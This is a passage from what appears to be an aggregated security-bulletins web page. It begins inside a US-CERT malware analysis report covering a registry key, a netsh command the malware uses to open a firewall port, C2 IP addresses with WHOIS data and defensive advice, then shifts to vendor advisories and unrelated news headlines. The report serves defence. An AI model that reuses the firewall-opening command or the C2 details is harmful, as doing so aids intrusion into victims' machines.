hKey = HKEY_LOCAL_MACHINE
Subkey = "SOFTWARE\Microsoft\Windows\CurrentVersion\PrintConfigs"
ValueName = "Description"
ValueData = "RC4 encrypted configuration file data"
--End registry key--

Analysis indicates that the decrypted configuration data contains port numbers. The malware utilized the following command to open the Windows Firewall on the victim’s machine to allow incoming connections:

--Begin firewall modification--
"netsh.exe advfirewall firewall add rule name="PortOpenning" dir=in protocol=tcp localport=<decrypted port number> action=allow enable=yes"
--End firewall modification--

The malware attempts to open the predefined port and waits for connection. The malware contains public SSL certificates in its resource name "101”. It is designed to generate crafted TLS sessions (fake TLS communication mechanism).

98.101.211.162

Ports
  • 443 TCP
Whois

NetRange:     98.100.0.0 - 98.103.255.255
CIDR:         98.100.0.0/14
NetName:        RCMS
NetHandle:     NET-98-100-0-0-1
Parent:         NET98 (NET-98-0-0-0-0)
NetType:        Direct Allocation
OriginAS:    
Organization: Time Warner Cable Internet LLC (RCMS)
RegDate:        2008-03-17
Updated:        2009-05-05
Ref:            https://whois.arin.net/rest/net/NET-98-100-0-0-1


OrgName:        Time Warner Cable Internet LLC
OrgId:         RCMS
Address:        6399 S Fiddlers Green Circle
City:         Greenwood Village
StateProv:     CO
PostalCode:     80111
Country:        US
RegDate:        2001-09-25
Updated:        2018-03-07
Comment:        Allocations for this OrgID serve Road Runner commercial customers out of the Columbus, OH, Herndon, VA and Raleigh, NC RDCs.
Ref:            https://whois.arin.net/rest/org/RCMS

Relationships
98.101.211.162Connected_From20abb95114de946da7595438e9edf0bf39c85ba8512709db7d5532d37d73bd64

81.0.213.173

Ports
  • 443 TCP
Whois

inetnum:        81.0.213.168 - 81.0.213.175
netname:        CmsConsulting-CZ
descr:         CMS Consulting s.r.o.
country:        CZ
admin-c:        CASA3-RIPE
tech-c:         CASA3-RIPE
status:         ASSIGNED PA
mnt-by:         CASABLANCA-RIPE-MNT
created:        2009-10-09T07:31:35Z
last-modified: 2009-10-09T07:31:35Z
source:         RIPE

role:         Casablanca INT RIPE manager
address:        Casablanca INT
address:        Vinohradska 184, Prague 3 - 130 52
address:        Czech republic
phone:         +420 270 000 270
fax-no:         +420 270 000 277
e-mail:         hostmaster@casablanca.cz
abuse-mailbox: abuse@casablanca.cz
admin-c:        JH1771-RIPE
tech-c:         JH1771-RIPE
notify:         hostmaster@casablanca.cz
nic-hdl:        CASA3-RIPE
created:        2005-09-05T10:42:10Z
last-modified: 2015-07-03T11:19:49Z
source:         RIPE
mnt-by:         CASABLANCA-CORE-MNT

% Information related to '81.0.213.0/24AS15685'

route:         81.0.213.0/24
descr:         Casablanca INT prefix fraction
origin:         AS15685
mnt-by:         CASABLANCA-CORE-MNT
created:        2017-06-30T09:41:16Z
last-modified: 2017-06-30T09:41:16Z
source:         RIPE

Relationships
81.0.213.173Connected_From20abb95114de946da7595438e9edf0bf39c85ba8512709db7d5532d37d73bd64

184.107.209.2

Ports
  • 443 TCP
Whois

Domain Name: TVDAIJIWORLD.COM
Registry Domain ID: 632237350_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2017-10-16T06:44:25Z
Creation Date: 2006-10-14T19:18:50Z
Registrar Registration Expiration Date: 2018-10-14T19:18:50Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: ******** ******** (see Notes section below on how to view unmasked data)
Registrant Organization: Konkandaiz
Registrant Street: Post Box 53608
Registrant Street: Dubai
Registrant City: Dubai
Registrant State/Province: Not Applicable
Registrant Postal Code: 04
Registrant Country: AE
Registrant Phone: ************
Registrant Phone Ext:
Registrant Fax: 111111111111
Registrant Fax Ext:
Registrant Email: ********@*****.***
Registry Admin ID: Not Available From Registry
Admin Name: ******** ******** (see Notes section below on how to view unmasked data)
Admin Organization: Konkandaiz
Admin Street: Post Box 53608
Admin Street: Dubai
Admin City: Dubai
Admin State/Province: Not Applicable
Admin Postal Code: 04
Admin Country: AE
Admin Phone: ************
Admin Phone Ext:
Admin Fax: 111111111111
Admin Fax Ext:
Admin Email: ********@*****.***
Registry Tech ID: Not Available From Registry
Tech Name: ******** ******** (see Notes section below on how to view unmasked data)
Tech Organization: Konkandaiz
Tech Street: Post Box 53608
Tech Street: Dubai
Tech City: Dubai
Tech State/Province: Not Applicable
Tech Postal Code: 04
Tech Country: AE
Tech Phone: ************
Tech Phone Ext:
Tech Fax: 111111111111
Tech Fax Ext:
Tech Email: ********@*****.***
Name Server: MY.PRIVATEDNS.COM
Name Server: YOUR.PRIVATEDNS.COM
DNSSEC: unsigned

Relationships
184.107.209.2Connected_From3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210

111.207.78.204

Ports
  • 443 TCP
Whois

inetnum:        111.192.0.0 - 111.207.255.255
netname:        UNICOM-BJ
descr:         China Unicom Beijing province network
descr:         China Unicom
country:        CN
admin-c:        CH1302-AP
tech-c:         SY21-AP
remarks:        service provider
mnt-by:         APNIC-HM
mnt-lower:     MAINT-CNCGROUP
mnt-lower:     MAINT-CNCGROUP-BJ
mnt-routes:     MAINT-CNCGROUP-RR
status:         ALLOCATED PORTABLE
mnt-irt:        IRT-CU-CN
last-modified: 2016-05-04T00:18:25Z
irt:            IRT-CU-CN
address:        No.21,Financial Street
address:        Beijing,100033
address:        P.R.China
e-mail:         hqs-ipabuse@chinaunicom.cn
abuse-mailbox: hqs-ipabuse@chinaunicom.cn
admin-c:        CH1302-AP
tech-c:         CH1302-AP
auth:         # Filtered
mnt-by:         MAINT-CNCGROUP
last-modified: 2017-10-23T05:59:13Z
person:         ChinaUnicom Hostmaster
nic-hdl:        CH1302-AP
e-mail:         hqs-ipabuse@chinaunicom.cn
address:        No.21,Jin-Rong Street
address:        Beijing,100033
address:        P.R.China
phone:         +86-10-66259764
fax-no:         +86-10-66259764
country:        CN
mnt-by:         MAINT-CNCGROUP
last-modified: 2017-08-17T06:13:16Z
person:         sun ying
address:        fu xing men nei da jie 97, Xicheng District
address:        Beijing 100800
country:        CN
phone:         +86-10-66030657
fax-no:         +86-10-66078815
e-mail:         hostmast@publicf.bta.net.cn
nic-hdl:        SY21-AP
mnt-by:         MAINT-CNCGROUP-BJ
last-modified: 2009-06-30T08:42:48Z
source:         APNIC

Relationships
111.207.78.204Connected_From3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210

80.91.118.45

Ports
  • 443 TCP
Whois

inetnum:        80.91.118.0 - 80.91.119.255
netname:        Abissnet
descr:         Business Customers
country:        AL
admin-c:        AB34506-RIPE
tech-c:         AB34506-RIPE
status:         ASSIGNED PA
mnt-by:         AS35047-MNT
created:        2014-10-24T10:09:33Z
last-modified: 2016-06-09T09:47:15Z
source:         RIPE
role:         Abissnet BBone
address:        Rr. Ismail Qemali, P. Abissnet
e-mail:         bbone@abissnet.al
abuse-mailbox: bbone@abissnet.al
nic-hdl:        AB34506-RIPE
mnt-by:         AS35047-MNT
created:        2016-06-09T08:09:15Z
last-modified: 2016-06-09T08:41:05Z
source:         RIPE

% Information related to '80.91.118.0/24AS35047'

route:         80.91.118.0/24
descr:         Abissnet ISP
origin:         AS35047
mnt-by:         AS35047-MNT
created:        2011-02-27T10:24:58Z
last-modified: 2011-02-27T10:24:58Z
source:         RIPE

Relationships
80.91.118.45Connected_From3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210

181.119.19.56

Ports
  • 443 TCP
Whois

NetRange:     181.0.0.0 - 181.255.255.255
CIDR:         181.0.0.0/8
NetName:        LACNIC-181
NetHandle:     NET-181-0-0-0-0
Parent:         ()
NetType:        Allocated to LACNIC
OriginAS:    
Organization: Latin American and Caribbean IP address Regional Registry (LACNIC)
RegDate:        1993-04-30
Updated:        2010-07-21
Comment:        This IP address range is under LACNIC responsibility
Comment:        for further allocations to users in LACNIC region.
Comment:        Please see http://www.lacnic.net/ for further details,
Comment:        or check the WHOIS server located at http://whois.lacnic.net
Ref:            https://whois.arin.net/rest/net/NET-181-0-0-0-0
OrgName:        Latin American and Caribbean IP address Regional Registry
OrgId:         LACNIC
Address:        Rambla Republica de Mexico 6125
City:         Montevideo
StateProv:    
PostalCode:     11400
Country:        UY
RegDate:        2002-07-26
Updated:        2018-03-15
Ref:            https://whois.arin.net/rest/org/LACNIC

Relationships
181.119.19.56Connected_From3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210

59.90.93.97

Ports
  • 443 TCP
Whois

inetnum:        59.90.64.0 - 59.90.127.255
netname:        BB-Multiplay
descr:         O/o DGM BB, NOC BSNL Bangalore
country:        IN
admin-c:        BH155-AP
tech-c:         DB374-AP
status:         ASSIGNED NON-PORTABLE
mnt-by:         MAINT-IN-DOT
mnt-irt:        IRT-BSNL-IN
last-modified: 2011-02-18T09:27:20Z
source:         APNIC

irt:            IRT-BSNL-IN
address:        Internet Cell
address:        Bharat Sanchar Nigam Limited
address:        8th Floor,148-B Statesman House
address:        Barakhamba Road, New Delhi - 110 001
e-mail:         abuse@bsnl.in
abuse-mailbox: abuse@bsnl.in
admin-c:        NC83-AP
tech-c:         CGMD1-AP
auth:         # Filtered
mnt-by:         MAINT-IN-DOT
last-modified: 2017-10-20T05:42:50Z
source:         APNIC

person:         BSNL Hostmaster
nic-hdl:        BH155-AP
e-mail:         hostmaster@bsnl.in
address:        Broadband Networks
address:        Bharat Sanchar Nigam Limited
address:        2nd Floor, Telephone Exchange, Sector 62
address:        Noida
phone:         +91-120-2404243
fax-no:         +91-120-2404241
country:        IN
mnt-by:         MAINT-IN-PER-DOT
last-modified: 2015-11-12T06:00:14Z
person:         DGM Broadband
address:        BSNL NOC Bangalore
country:        IN
phone:         +91-080-25805800
fax-no:         +91-080-25800022
e-mail:         dnwplg@bsnl.in
nic-hdl:        DB374-AP
mnt-by:         MAINT-IN-PER-DOT
last-modified: 2011-02-19T10:03:44Z
source:         APNIC

% Information related to '59.90.80.0/20AS9829'

route:         59.90.80.0/20
descr:         BSNL Internet
country:        IN
origin:         AS9829
mnt-lower:     MAINT-IN-DOT
mnt-routes:     MAINT-IN-DOT
mnt-by:         MAINT-IN-AS9829
last-modified: 2008-09-04T07:54:47Z
source:         APNIC

Relationships
59.90.93.97Connected_Froma71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6

Relationship Summary

8c3e0204f5...Containsa71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6
a71017302e...Connected_To59.90.93.97
a71017302e...Contained_Within8c3e0204f52200325ed36db9b12aba1c5e46984d415514538a5bf10783cacdf8
675a35e04b...Containse69d6c2d3e9c4beebee7f3a4a3892e5fdc601beda7c3ec735f0dfba2b29418a7
e69d6c2d3e...Contained_Within675a35e04b19aab314bcbc4b1f2610e3dea4a80c277cc5188f1d1391a00dfdb1
d1d490866d...Contains40ef57ca2a617f5d24ac624339ba2027b6cf301c28684bf8b2075fc7a2e95116
40ef57ca2a...Contained_Withind1d490866d4a4d29306f0d9300bffc1450c41bb8fd62371d29672bf9f747bf92
546dbd370a...Contains3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210
3c809a1010...Contained_Within546dbd370a40c8e46f9b599a414f25000eec5ae6b3e046a035fe6e6cd5d874e1
3c809a1010...Connected_To184.107.209.2
3c809a1010...Connected_To111.207.78.204
3c809a1010...Connected_To80.91.118.45
3c809a1010...Connected_To181.119.19.56
c9e3b83d77...Containse088c3a0b0f466df5329d9a66ff618de3d468d8a5981715303babb1452631eef
e088c3a0b0...Contained_Withinc9e3b83d77ce93cc1d70b22e967f049b13515c88572aa78e0a838103e5478777
20abb95114...Connected_To98.101.211.162
20abb95114...Connected_To81.0.213.173
98.101.211.162Connected_From20abb95114de946da7595438e9edf0bf39c85ba8512709db7d5532d37d73bd64
81.0.213.173Connected_From20abb95114de946da7595438e9edf0bf39c85ba8512709db7d5532d37d73bd64
184.107.209.2Connected_From3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210
111.207.78.204Connected_From3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210
80.91.118.45Connected_From3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210
181.119.19.56Connected_From3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210
59.90.93.97Connected_Froma71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6

Recommendations

NCCIC would like to remind users and administrators to consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumbdrives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate ACLs.

Additional information on malware incident prevention and handling can be found in NIST's Special Publication 800-83, Guide to Malware Incident Prevention & Handling for Desktops and Laptops.

Contact Information

NCCIC continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact US-CERT and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact US-CERT and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the NCCIC at 1-888-282-0870 or soc@us-cert.gov.

Can I submit malware to NCCIC? Malware samples can be submitted via three methods:

NCCIC encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on US-CERT's homepage at www.us-cert.gov.

Revisions

  • June 14, 2018: Initial version

This product is provided subject to this Notification and this Privacy & Use policy.


 Wed, 13 Jun 2018 23:00:00 +0000 ISC Releases Security Advisory for BIND
Original release date: June 13, 2018

The Internet Systems Consortium (ISC) has released a security advisory that addresses a vulnerability affecting multiple versions of ISC Berkeley Internet Name Domain (BIND). A remote attacker could exploit this vulnerability to obtain sensitive information.

NCCIC encourages users and administrators to review the ISC Knowledge Base Article AA-01616 and apply the necessary workarounds.


This product is provided subject to this Notification and this Privacy & Use policy.


 Wed, 13 Jun 2018 22:47:45 +0000 Intel Releases Security Advisory on Lazy FP State Restore Vulnerability
Original release date: June 13, 2018

Intel has released recommendations to address a vulnerability—dubbed Lazy FP state restore—affecting Intel Core-based microprocessors. An attacker could exploit this vulnerability to obtain access to sensitive information.

NCCIC encourages users and administrators to review Intel's Security Advisory INTEL-SA-00145, apply the necessary mitigations, and refer to software vendors for appropriate patches, when available.


This product is provided subject to this Notification and this Privacy & Use policy.


 Wed, 13 Jun 2018 21:53:22 +0000 Apple Releases Security Update for Xcode
Original release date: June 13, 2018

Apple has released a security update to address vulnerabilities in Xcode. An attacker could exploit one of these vulnerabilities to take control of an affected system.

NCCIC encourages users and administrators to review Apple’s security page for Xcode 9.4.1 and apply the necessary update.


This product is provided subject to this Notification and this Privacy & Use policy.



[logo] SecurityFocus Vulnerabilities   more  xml  hide  
last updated: Fri, 22 Jun 2018 10:31:02 GMT

 2018-06-21 Vuln: Multiple CPU Hardware CVE-2017-5715 Information Disclosure Vulnerability
Multiple CPU Hardware CVE-2017-5715 Information Disclosure Vulnerability
 2018-06-21 Vuln: Delta Industrial Automation COMMGR CVE-2018-10594 Stack Based Buffer Overflow Vulnerability
Delta Industrial Automation COMMGR CVE-2018-10594 Stack Based Buffer Overflow Vulnerability
 2018-06-21 Vuln: Multiple Rockwell Automation Products CVE-2017-9312 Remote Denial of Service Vulnerability
Multiple Rockwell Automation Products CVE-2017-9312 Remote Denial of Service Vulnerability
 2018-06-20 Vuln: Oracle Outside In Technology CVE-2018-2806 Remote Security Vulnerability
Oracle Outside In Technology CVE-2018-2806 Remote Security Vulnerability
  Bugtraq: FreeBSD Security Advisory FreeBSD-SA-18:07.lazyfpu
FreeBSD Security Advisory FreeBSD-SA-18:07.lazyfpu

[logo] Yahoo News - Latest News & Headlines   more  xml  hide  
last updated: Fri, 22 Jun 2018 10:38:02 GMT

 Wed, 20 Jun 2018 15:02:32 -0400 Trump's Plan To Stop Family Separations Is To Detain Families Together

Trump's Plan To Stop Family Separations Is To Detain Families TogetherPresident Donald Trump's plan to stop his administration's policy of


 Thu, 21 Jun 2018 17:51:47 -0400 Migrant Children Report Physical, Verbal Abuse In At Least 3 Federal Detention Centers

Migrant Children Report Physical, Verbal Abuse In At Least 3 Federal Detention CentersMigrant children as young as 11 years old have reported suffering physical and


 Thu, 21 Jun 2018 12:06:38 -0400 Democrats look to gain in Southern California as outrage mounts over family separations

Democrats look to gain in Southern California as outrage mounts over family separationsDemocrats are already plotting about how to motivate and mobilize the 66 percent of voters who oppose Trump’s “zero tolerance” policy.


 Wed, 20 Jun 2018 11:42:32 -0400 Trump executive order leaves critics wondering what’s next for migrant families

Trump executive order leaves critics wondering what’s next for migrant familiesPresident Trump’s executive order allowing migrant families to remain together was met with skepticism as critics argue it will be difficult to reunite families that have already been separated.


 Wed, 20 Jun 2018 07:29:03 -0400 South Sudan president Kiir departs for Ethiopia ahead of peace talks

South Sudan president Kiir departs for Ethiopia ahead of peace talksSouth Sudan President Salva Kiir left the capital on Wednesday and headed to Ethiopia ahead of a planned meeting with his rival and rebel leader Riek Machar ahead of planned talks to try to negotiate an end to a five-year-old civil war, an official said. "IGAD has decided to call face-to-face dialogue between our president and Riek Machar on outstanding issues," Awut Deng, a senior member of Kiir's delegation, said before departing, referring to the regional East African bloc.



Cisco Security Advisory   more  xml  hide  
last updated: Fri, 22 Jun 2018 10:36:57 GMT

 Wed, 20 Jun 2018 16:18:23 CDT Cisco NX-OS Software CLI Arbitrary Command Injection Vulnerability

A vulnerability in the CLI of Cisco NX-OS Software could allow an authenticated, local attacker to perform a command-injection attack on an affected device.

The vulnerability is due to insufficient input validation of command arguments. An attacker could exploit this vulnerability by injecting malicious command arguments into a vulnerable CLI command. A successful exploit could allow the attacker, authenticated as a privileged user, to execute arbitrary commands with root privileges.

Note: On products that support multiple virtual device contexts (VDC), this vulnerability could allow an attacker to access files from any VDC.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180620-nx-os-cli-injection

This advisory is part of the June 2018 Cisco FXOS and NX-OS Software Security Advisory Collection, which includes 24 Cisco Security Advisories that describe 24 vulnerabilities. For a complete list of the advisories and links to them, see Cisco Event Response: June 2018 Cisco FXOS and NX-OS Software Security Advisory Collection.


Security Impact Rating: High
CVE: CVE-2018-0307
 Wed, 20 Jun 2018 16:00:00 CDT Cisco AnyConnect Secure Mobility Client for Windows Desktop Denial of Service Vulnerability

A vulnerability in vpnva-6.sys for 32-bit Windows and vpnva64-6.sys for 64-bit Windows of Cisco AnyConnect Secure Mobility Client for Windows Desktop could allow an authenticated, local attacker to cause a denial of service (DoS) condition on an affected system.

The vulnerability is due to improper validation of user-supplied data. An attacker could exploit this vulnerability by sending a malicious request to the application. A successful exploit could allow the attacker to cause a DoS condition on the affected system.

There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180620-anyconnect-dos
Security Impact Rating: Medium
CVE: CVE-2018-0373
 Wed, 20 Jun 2018 16:00:00 CDT Cisco TelePresence Video Communication Server Expressway Denial of Service Vulnerability

A vulnerability in the file descriptor handling of Cisco TelePresence Video Communication Server (VCS) Expressway could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition.

The vulnerability is due to exhaustion of file descriptors while processing a high volume of traffic. An attacker could exploit this vulnerability by establishing a high number of concurrent TCP connections to the vulnerable system. An exploit could allow the attacker to cause a restart in a specific process, resulting in a temporary interruption of service.

There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180620-vcse-dos


Security Impact Rating: Medium
CVE: CVE-2018-0358
 Wed, 20 Jun 2018 16:00:00 CDT Cisco Unified Communications Manager IM & Presence Service CSRF Vulnerability

A vulnerability in the web-based management interface of Cisco Unified Communications Manager IM & Presence Service (formerly CUPS) could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack and perform arbitrary actions on an affected device.

The vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a crafted link. A successful exploit could allow the attacker to perform arbitrary actions on a targeted device via a web browser and with the privileges of the user.

There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180620-ucmim-ps-csrf


Security Impact Rating: Medium
CVE: CVE-2018-0363
 Wed, 20 Jun 2018 16:00:00 CDT Cisco Unified Communications Domain Manager Cross-Site Request Forgery Vulnerability

A vulnerability in the web-based management interface of Cisco Unified Communications Domain Manager could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack and perform arbitrary actions on an affected device.

The vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a crafted link. A successful exploit could allow the attacker to perform arbitrary actions on a targeted device via a web browser and with the privileges of the user.

There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180620-ucdm-csrf


Security Impact Rating: Medium
CVE: CVE-2018-0364

powered by zFeeder

Reload this page to check for the most recent news updates.

Please read our legal disclaimer for the use of this information.

Stay Secure
Axiom understands how vital the security of your data is to your organization. Please don't hesitate to contact us if you would like a professional assessment of your network infrastructure.
Home Axiom Advisor Security Bulletins